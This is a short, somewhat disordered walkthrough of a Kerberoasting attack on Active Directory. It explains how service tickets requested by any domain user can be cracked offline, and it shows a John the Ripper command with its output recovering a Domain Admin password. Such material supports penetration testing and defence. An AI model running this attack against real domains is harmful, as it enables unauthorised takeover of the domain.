For several reasons, it is very common in Active Directory environments to find services launched with domain administrator accounts. A Service Principal Name (SPN) associates a service and the user who launched it.
Any domain user is allowed to request a ticket for a service and locally crack it to retrieve the cleartext password of the domain administrator who launched the service.
If the attack is successful, the attacker compromise the Active Directory domain.
uberuser belongs to Domain Admins group (cf. MemberOf column).
Crack Tickets
root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123 ($krb5tgs$unkown)
ASDqwe123 ($krb5tgs$unkown)
It is an efficient way to compromise domain admin password and consequently Active Directory domain.
References
First, install MagnumRipper version of which supports KRB5TGS format.
Then crack Tickets to obtain cleartext passwords:
